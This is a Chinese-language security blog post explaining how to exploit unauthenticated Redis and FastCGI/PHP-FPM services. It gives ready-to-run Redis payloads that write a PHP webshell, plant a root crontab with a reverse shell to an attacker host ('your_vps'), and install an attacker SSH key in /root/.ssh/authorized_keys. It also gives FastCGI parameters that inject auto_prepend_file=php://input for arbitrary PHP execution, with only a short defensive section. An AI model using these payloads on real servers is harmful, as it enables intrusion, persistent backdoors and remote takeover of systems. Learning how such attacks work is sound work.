
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Redis&amp;Fastcgi未授权访问漏洞 | 离怀秋</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="Redis未授权访问redis介绍Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。Redis未授权访问的原因产生于未能正确的配置&#x2F;etc&#x2F;redis.conf的内容。 如bind开启的是0.0.0.0或者没有开启保护模式等等。造成危险操作未授权访问。并且未授权访问可以造成很多危害。 redis未授权访问常见命令操作 查看所有键  keys *  查看版">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis&amp;Fastcgi未授权访问漏洞">
<meta property="og:url" content="http://yoursite.com/2019/06/30/Redis-Fastcgi%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="离怀秋">
<meta property="og:description" content="Redis未授权访问redis介绍Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。Redis未授权访问的原因产生于未能正确的配置&#x2F;etc&#x2F;redis.conf的内容。 如bind开启的是0.0.0.0或者没有开启保护模式等等。造成危险操作未授权访问。并且未授权访问可以造成很多危害。 redis未授权访问常见命令操作 查看所有键  keys *  查看版">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/28/ZMRn29.md.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/28/ZMf7v9.md.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/06/28/ZMhm8g.md.png">
<meta property="og:image" content="http://img.php.cn/upload/article/000/153/291/6c9bcffa8cfbeeb8c79eaf3705720116-0.png">
<meta property="og:image" content="http://img.php.cn/upload/article/000/153/291/6c9bcffa8cfbeeb8c79eaf3705720116-1.png">
<meta property="article:published_time" content="2019-06-30T01:06:15.000Z">
<meta property="article:modified_time" content="2019-06-30T01:07:10.000Z">
<meta property="article:author" content="离怀秋">
<meta property="article:tag" content="Web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/06/28/ZMRn29.md.png">
  
    <link rel="alternative" href="/atom.xml" title="离怀秋" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">离怀秋</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">心未死 战未败</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="yoursite.com">
        </form>
      </div>
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-Redis-Fastcgi未授权访问漏洞" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/06/30/Redis-Fastcgi%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/" class="article-date">
  <time datetime="2019-06-30T01:06:15.000Z" itemprop="datePublished">2019-06-30</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Redis&amp;Fastcgi未授权访问漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="Redis未授权访问"><a href="#Redis未授权访问" class="headerlink" title="Redis未授权访问"></a>Redis未授权访问</h2><h3 id="redis介绍"><a href="#redis介绍" class="headerlink" title="redis介绍"></a>redis介绍</h3><p>Redis是一个使用<code>ANSI C</code>编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。Redis未授权访问的原因产生于未能正确的配置<code>/etc/redis.conf</code>的内容。</p>
<p>如<code>bind</code>开启的是<code>0.0.0.0</code>或者没有开启保护模式等等。造成危险操作未授权访问。并且未授权访问可以造成很多危害。</p>
<h3 id="redis未授权访问常见命令操作"><a href="#redis未授权访问常见命令操作" class="headerlink" title="redis未授权访问常见命令操作"></a>redis未授权访问常见命令操作</h3><ul>
<li>查看所有键</li>
</ul>
<p><code>keys *</code></p>
<ul>
<li>查看版本等敏感信息</li>
</ul>
<p><code>info</code></p>
<ul>
<li>设置键值与查看键值</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">set xxx   xxxx</span><br><span class="line"></span><br><span class="line">get xxx</span><br></pre></td></tr></table></figure>

<ul>
<li>设置配置信息</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">config set dbfilename xxx</span><br><span class="line"></span><br><span class="line">config get dbfilename</span><br></pre></td></tr></table></figure>

<ul>
<li>删除数据库的所有键值对</li>
</ul>
<p><code>flushall</code></p>
<h3 id="redis写webshell"><a href="#redis写webshell" class="headerlink" title="redis写webshell"></a>redis写webshell</h3><p>在较低权限下可利用此方法写webshell，payload如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;var&#x2F;www&#x2F;html</span><br><span class="line"></span><br><span class="line">config set dbfilename webshell.php</span><br><span class="line"></span><br><span class="line">set x &quot;&lt;?php phpinfo();?&gt;&quot;</span><br><span class="line"></span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p>即可在公网下生成文件</p>
<p><a href="https://imgchr.com/i/ZMRn29" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/06/28/ZMRn29.md.png" alt="ZMRn29.md.png"></a></p>
<p>在实战中产生的问题，当键值对过多，无法直接<code>save</code>到我们的<code>webshell.php</code>中，所以可以通过<code>flushall</code>来清楚所有的键值对，再来写入我们的<code>shell</code>，不过这个方法影响太大了…不太建议使用。</p>
<h3 id="redis利用定时任务-corntab-反弹shell"><a href="#redis利用定时任务-corntab-反弹shell" class="headerlink" title="redis利用定时任务(corntab)反弹shell"></a>redis利用定时任务(corntab)反弹shell</h3><p>限定条件：<strong>在redis以root权限运行时可以写crontab执行命令反弹shell</strong></p>
<p>crontab介绍：linux的定时任务主要使用<code>crontab</code>文件中加入定时任务执行，目录为<code>/var/spool/cron</code>下,文件名对应着执行该定时任务的用户名。</p>
<p>操作payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">set aaa &quot;\n\n* * * * * bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;your_vps&#x2F;your_port 0&gt;&amp;1\n\n&quot;</span><br><span class="line"></span><br><span class="line">config set dir &#x2F;var&#x2F;spool&#x2F;cron</span><br><span class="line"></span><br><span class="line">config set dbfilename root</span><br><span class="line"></span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p><code>\n\n</code>的作用为和其他内容进行分离，通过在cron目录下写计划任务，即可反弹shell</p>
<p><a href="https://imgchr.com/i/ZMf7v9" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/06/28/ZMf7v9.md.png" alt="ZMf7v9.md.png"></a></p>
<p>注意点：crontab无法在<code>debian,ubuntu</code>上反弹，因为这两个系统对计划任务的格式要求很严，必须执行</p>
<p><code>crontab -u root /var/spool/cron/crontabs/root</code></p>
<h3 id="redis写入SSH公钥进行直连"><a href="#redis写入SSH公钥进行直连" class="headerlink" title="redis写入SSH公钥进行直连"></a>redis写入SSH公钥进行直连</h3><p>首先生成公钥</p>
<p><a href="https://imgchr.com/i/ZMhm8g" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/06/28/ZMhm8g.md.png" alt="ZMhm8g.md.png"></a></p>
<p>将公钥利用如下<code>payload</code>放到靶机的<code>~/.ssh</code>中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;root&#x2F;.ssh</span><br><span class="line"></span><br><span class="line">config set dbfilename  authorized_keys</span><br><span class="line"></span><br><span class="line">set x &quot;\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZS8alMMMzm8OXIcuTpbMf6wBfIrFzbInhZeteZh2PrHXiiG0UHlKHcZ&#x2F;l&#x2F;INRfNC3hFWVnc4zD1ch              96FJcszytymwK&#x2F;+pNKH&#x2F;qpw0oUPF86ihXSoLDDGuXApBW9fNww8MYvHxL&#x2F;UAOdb+zZ4KgVcAuPsEFiyOa9M2BgnR5Qie9ImRVux+KmWI+Y2S2IvnTkcw   z3b+dJUmfhHdf7Q+mz8xszhYNE2DAgUNxWngUd+61jdZssfn0eufY8sXOnARdVlvUb69Aeq&#x2F;m9LxqCuwNVJajCqs2pdUqZxinyeqGUceZQbUNVJp1JxcduD3pxgSmoXGRDLwDbMOg3XNSxSrKsqnroot@VM_0_6_centos\n\n\n&quot;</span><br><span class="line"></span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p>在本机中利用私钥连接</p>
<p><code>[root@VM_0_6_centos .ssh]# ssh -i id_rsa root@your_vps</code></p>
<p><strong>防御手段</strong></p>
<ul>
<li><code>bind</code>设置为<code>127.0.0.1</code></li>
<li><code>redis.conf</code>中开启保护模式</li>
</ul>
<h2 id="Fastcgi未授权访问"><a href="#Fastcgi未授权访问" class="headerlink" title="Fastcgi未授权访问"></a>Fastcgi未授权访问</h2><p>之前有跟着p牛的文章过了一遍<code>Fastcgi</code>，下面再学习理解一遍。</p>
<h3 id="Fastcgi介绍"><a href="#Fastcgi介绍" class="headerlink" title="Fastcgi介绍"></a>Fastcgi介绍</h3><p><code>Fastcgi</code>与<code>http</code>协议一样都是一个通信协议。<strong><code>http</code>协议的作用为在浏览器与服务器之间进行数据交换。过程为：浏览器将http头与http体组合为数据包，以tcp形式发送给服务器中间件，服务器中间件进行解析，在服务器上拿到对应的数据，并以http形式打包发回给浏览器。</strong></p>
<p><strong>Fastcgi协议</strong></p>
<p>如果我们请求的链接为一个静态页面，那么就会按照http协议这个流程发送给服务器中间件，服务器中间件去解码并且在服务器上拿到对应的资源然后按照tcp形式打包返回给浏览器</p>
<p><img src="http://img.php.cn/upload/article/000/153/291/6c9bcffa8cfbeeb8c79eaf3705720116-0.png" alt="img"></p>
<p>如果我们请求的是动态页面，如<code>index.php</code>，则过程图如下：</p>
<p><img src="http://img.php.cn/upload/article/000/153/291/6c9bcffa8cfbeeb8c79eaf3705720116-1.png" alt="img"></p>
<p>浏览器首先发送请求给服务器中间件<code>Nginx</code>，<code>Nginx</code>将用户请求以<code>Fastcgi</code>的规则打包好通过<code>tcp</code>传给<code>PHP-FPM</code>，<code>PHP-FPM</code>按照<code>Fastcgi</code>协议将<code>tcp</code>流解析为真正的数据，即先解析<code>php.ini</code>文件，初始化执行环境，处理请求，并将最终数据以返回给<code>web-Server</code>。</p>
<h3 id="PHP-FPM介绍"><a href="#PHP-FPM介绍" class="headerlink" title="PHP-FPM介绍"></a><strong>PHP-FPM介绍</strong></h3><p><code>PHP-FPM</code>其实在上述的协议图中已经透露出了他的作用，<code>PHP-FPM(PHP FastCGI Process Manager)</code>意：<code>PHP FastCGI</code>进程管理器，用于管理<code>PHP</code>进程池的软件，用于接受web服务器的请求。在上述流程中，<code>php-fpm</code>通过解析<code>php.ini</code>,初始化执行环境，才会将<code>tcp</code>流按照<code>fastcgi</code>形式解析为真正的数据。</p>
<p>当用户访问<a href="http://127.0.0.1/index.php?a=&amp;b=2,如对应的web目录为`/var/www/html`,`nginx`会将请求变为如下键值对" target="_blank" rel="noopener">http://127.0.0.1/index.php?a=&amp;b=2,如对应的web目录为`/var/www/html`,`nginx`会将请求变为如下键值对</a>:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &#39;GATEWAY_INTERFACE&#39;: &#39;FastCGI&#x2F;1.0&#39;,</span><br><span class="line">    &#39;REQUEST_METHOD&#39;: &#39;GET&#39;,</span><br><span class="line">    &#39;SCRIPT_FILENAME&#39;: &#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php&#39;,</span><br><span class="line">    &#39;SCRIPT_NAME&#39;: &#39;&#x2F;index.php&#39;,</span><br><span class="line">    &#39;QUERY_STRING&#39;: &#39;?a&#x3D;1&amp;b&#x3D;2&#39;,</span><br><span class="line">    &#39;REQUEST_URI&#39;: &#39;&#x2F;index.php?a&#x3D;1&amp;b&#x3D;2&#39;,</span><br><span class="line">    &#39;DOCUMENT_ROOT&#39;: &#39;&#x2F;var&#x2F;www&#x2F;html&#39;,</span><br><span class="line">    &#39;SERVER_SOFTWARE&#39;: &#39;php&#x2F;fcgiclient&#39;,</span><br><span class="line">    &#39;REMOTE_ADDR&#39;: &#39;127.0.0.1&#39;,</span><br><span class="line">    &#39;REMOTE_PORT&#39;: &#39;12345&#39;,</span><br><span class="line">    &#39;SERVER_ADDR&#39;: &#39;127.0.0.1&#39;,</span><br><span class="line">    &#39;SERVER_PORT&#39;: &#39;80&#39;,</span><br><span class="line">    &#39;SERVER_NAME&#39;: &quot;localhost&quot;,</span><br><span class="line">    &#39;SERVER_PROTOCOL&#39;: &#39;HTTP&#x2F;1.1&#39;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这些键值对其实就是对应的环境变量，<code>php-fpm</code>通过这些去初始化执行环境返回请求。大致过程为<code>PHP-FPM</code>通过<code>fastcgi</code>解析中间件传过来的<code>tcp</code>数据,按照这些键值对的环境变量去初始化执行环境，并执行<code>SCRIPT_NAME</code>所指向的文件，在本例子中执行的是<code>/var/www/html/index.php</code>。</p>
<h3 id="安全性思考"><a href="#安全性思考" class="headerlink" title="安全性思考"></a>安全性思考</h3><p>如果我们能控制<code>SCRIPT_NAME</code>所对应的值，那么其实就是可以执行我们想要的<code>php</code>文件..但是这个似乎不能实现，不过<code>nginx</code>解析漏洞则<code>&quot;变相&quot;</code>实现了这一点。</p>
<p>如果用户访问<a href="http://127.0.0.1/favicon.ico/.php，nginx则对应发送如下键值对给php-fpm" target="_blank" rel="noopener">http://127.0.0.1/favicon.ico/.php，nginx则对应发送如下键值对给php-fpm</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    ...</span><br><span class="line">    &#39;SCRIPT_FILENAME&#39;: &#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;favicon.ico&#x2F;.php&#39;,</span><br><span class="line">    &#39;SCRIPT_NAME&#39;: &#39;&#x2F;favicon.ico&#x2F;.php&#39;,</span><br><span class="line">    &#39;REQUEST_URI&#39;: &#39;&#x2F;favicon.ico&#x2F;.php&#39;,</span><br><span class="line">    &#39;DOCUMENT_ROOT&#39;: &#39;&#x2F;var&#x2F;www&#x2F;html&#39;,</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>由于<code>fix_pathinfo</code>选项在试别到<code>/var/www/html/favicon.ico/.php</code>时，发现这个文件时不存在在的，则会去掉<code>/.php</code>，将<code>favicon.ico</code>当作<code>php</code>文件执行，为了防范此漏洞，<code>fpm</code>中默认增加了一个配置选项<code>security.limit_extensions</code>，内容如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">; Limits the extensions of the main script FPM will allow to parse. This can</span><br><span class="line">; prevent configuration mistakes on the web server side. You should only limit</span><br><span class="line">; FPM to .php extensions to prevent malicious users to use other extensions to</span><br><span class="line">; exectute php code.</span><br><span class="line">; Note: set an empty value to allow all extensions.</span><br><span class="line">; Default Value: .php</span><br><span class="line">;security.limit_extensions &#x3D; .php .php3 .php4 .php5 .php7</span><br></pre></td></tr></table></figure>

<p>这样只会解析特定后缀的文件，避免产生上述的漏洞情况。</p>
<h3 id="攻击点-未授权访问漏洞的产生"><a href="#攻击点-未授权访问漏洞的产生" class="headerlink" title="攻击点(未授权访问漏洞的产生)"></a>攻击点(未授权访问漏洞的产生)</h3><p>在<code>php.ini</code>中有两个配置选项,<code>auto_prepend_file</code>与<code>auto_append_file</code>,</p>
<p><code>auto_prepend_file</code>作用为，在执行目标文件之前，先包含<code>auto_prepend_file</code>指定的文件。<code>auto_append_file</code>作用为，在执行目标文件之后，再包含<code>auto_prepend_file</code>中指定的文件。所以<code>auto_prepend_file</code>去配合<code>php://input</code>则会产生奇效，去执行我们body中的任意php代码。</p>
<p><strong>设置<code>auto_prepend_file</code>的方法</strong></p>
<p><code>PHP_VALUE</code>可以设置模式为<code>PHP_INI_USER</code>和<code>PHP_INI_ALL</code>的选项，<code>PHP_ADMIN_VALUE</code>可以设置所有选项。</p>
<p><strong>找到一个php文件的绝对路径</strong></p>
<p>上述的<code>security.limit_extensions</code>选项限制了我们只能执行特定后缀的文件，所以我们必须找到一个php文件的绝对路径，才能触发此漏洞，可以通过默认源安装文件进行触发如<code>/usr/local/lib/php/PEAR.php</code>,再debian7上存在的文件是<code>/var/cache/dictionaries-common/sqspell.php</code>，所以通过传入如下键值对就可以任意php代码执行。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &#39;GATEWAY_INTERFACE&#39;: &#39;FastCGI&#x2F;1.0&#39;,</span><br><span class="line">    &#39;REQUEST_METHOD&#39;: &#39;GET&#39;,</span><br><span class="line">    &#39;SCRIPT_FILENAME&#39;: &#39;&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php&#39;,</span><br><span class="line">    &#39;SCRIPT_NAME&#39;: &#39;&#x2F;index.php&#39;,</span><br><span class="line">    &#39;QUERY_STRING&#39;: &#39;?a&#x3D;1&amp;b&#x3D;2&#39;,</span><br><span class="line">    &#39;REQUEST_URI&#39;: &#39;&#x2F;index.php?a&#x3D;1&amp;b&#x3D;2&#39;,</span><br><span class="line">    &#39;DOCUMENT_ROOT&#39;: &#39;&#x2F;var&#x2F;www&#x2F;html&#39;,</span><br><span class="line">    &#39;SERVER_SOFTWARE&#39;: &#39;php&#x2F;fcgiclient&#39;,</span><br><span class="line">    &#39;REMOTE_ADDR&#39;: &#39;127.0.0.1&#39;,</span><br><span class="line">    &#39;REMOTE_PORT&#39;: &#39;12345&#39;,</span><br><span class="line">    &#39;SERVER_ADDR&#39;: &#39;127.0.0.1&#39;,</span><br><span class="line">    &#39;SERVER_PORT&#39;: &#39;80&#39;,</span><br><span class="line">    &#39;SERVER_NAME&#39;: &quot;localhost&quot;,</span><br><span class="line">    &#39;SERVER_PROTOCOL&#39;: &#39;HTTP&#x2F;1.1&#39;</span><br><span class="line">    &#39;PHP_VALUE&#39;: &#39;auto_prepend_file &#x3D; php:&#x2F;&#x2F;input&#39;,</span><br><span class="line">    &#39;PHP_ADMIN_VALUE&#39;: &#39;allow_url_include &#x3D; On&#39;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="利用限制"><a href="#利用限制" class="headerlink" title="利用限制"></a>利用限制</h3><ul>
<li>网站对外开放9000端口。</li>
<li>有一个php文件的绝对路径。</li>
</ul>
<p>其实如果网站没有开放<code>9000</code>端口的话，我们也是可以通过<code>ssrf</code>配合<code>gopher</code>去攻击内网的<code>Fastcgi</code>应用的(详见下期博客hh</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://p0sec.net/index.php/archives/69/" target="_blank" rel="noopener">https://p0sec.net/index.php/archives/69/</a></p>
<p><a href="https://xz.aliyun.com/t/4051#toc-7" target="_blank" rel="noopener">https://xz.aliyun.com/t/4051#toc-7</a></p>
<p><a href="https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html</a></p>
<p><a href="http://www.php.cn/php-weizijiaocheng-392861.html" target="_blank" rel="noopener">http://www.php.cn/php-weizijiaocheng-392861.html</a></p>

      
    </div>
    <footer class="article-footer">
      
        <a data-url="http://yoursite.com/2019/06/30/Redis-Fastcgi%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/" data-id="ckabsu38h001skkvr2jbc1ixv" class="article-share-link" data-share="baidu" data-title="Redis&amp;Fastcgi未授权访问漏洞">Share</a>
      

      
        <a href="http://yoursite.com/2019/06/30/Redis-Fastcgi%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/#ds-thread" class="article-comment-link">Comments</a>
      

      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2019/06/30/Gopher%E5%8D%8F%E8%AE%AE%E9%82%82%E9%80%85%E5%86%85%E7%BD%91%E5%BA%94%E7%94%A8/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Gopher协议邂逅内网应用
        
      </div>
    </a>
  
  
    <a href="/2019/06/29/SQL%E6%B3%A8%E5%85%A5%E6%9C%89%E8%B6%A3%E5%A7%BF%E5%8A%BF%E6%80%BB%E7%BB%93/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">SQL注入有趣姿势总结</div>
    </a>
  
</nav>

  
</article>


  <section id="comments">
    <div id="ds-thread" class="ds-thread" data-thread-key="2019/06/30/Redis-Fastcgi未授权访问漏洞/" data-title="Redis&amp;Fastcgi未授权访问漏洞" data-url="http://yoursite.com/2019/06/30/Redis-Fastcgi%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/"></div>
  </section>
</section>
      
      <aside id="sidebar">
  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">30</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Crypto/" rel="tag">Crypto</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/WEB%E5%AE%89%E5%85%A8/" rel="tag">WEB安全</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a><span class="tag-list-count">7</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag">Web安全</a><span class="tag-list-count">26</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" rel="tag">生活随笔</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9A%8F%E7%AC%94/" rel="tag">随笔</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CTF/" style="font-size: 20px;">CTF</a> <a href="/tags/Crypto/" style="font-size: 12.5px;">Crypto</a> <a href="/tags/WEB%E5%AE%89%E5%85%A8/" style="font-size: 10px;">WEB安全</a> <a href="/tags/Web/" style="font-size: 15px;">Web</a> <a href="/tags/Web%E5%AE%89%E5%85%A8/" style="font-size: 17.5px;">Web安全</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a> <a href="/tags/xss/" style="font-size: 10px;">xss</a> <a href="/tags/%E7%94%9F%E6%B4%BB%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">生活随笔</a> <a href="/tags/%E9%9A%8F%E7%AC%94/" style="font-size: 10px;">随笔</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/05/">May 2020</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a><span class="archive-list-count">4</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/02/">February 2020</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a><span class="archive-list-count">12</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a><span class="archive-list-count">21</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2020/05/13/Apache-Common-Collections-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/">Apache Common Collections 反序列化分析学习</a>
          </li>
        
          <li>
            <a href="/2020/05/12/intigriti-Easter-XSS-challenge/">intigriti Easter XSS challenge</a>
          </li>
        
          <li>
            <a href="/2020/04/22/VolgaCTF-2020-Qualifier-Web/">VolgaCTF 2020 Qualifier-Web</a>
          </li>
        
          <li>
            <a href="/2020/04/15/DOM-Clobbering-Attack/">DOM Clobbering Attack</a>
          </li>
        
          <li>
            <a href="/2020/04/09/Javascript%E4%B8%AD%E5%8F%98%E9%87%8F%E5%A3%B0%E6%98%8E%E5%B8%A6%E6%9D%A5%E7%9A%84Tags-Broken/">Javascript中变量声明带来的Tags Broken</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Links</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="http://arvinxiang.com" target="_blank">主题作者</a>
          </li>
        
          <li>
            <a href="http://reqianduan.com" target="_blank">热前端</a>
          </li>
        
          <li>
            <a href="http://yuancheng.work" target="_blank">远程.work</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2020 离怀秋<br>
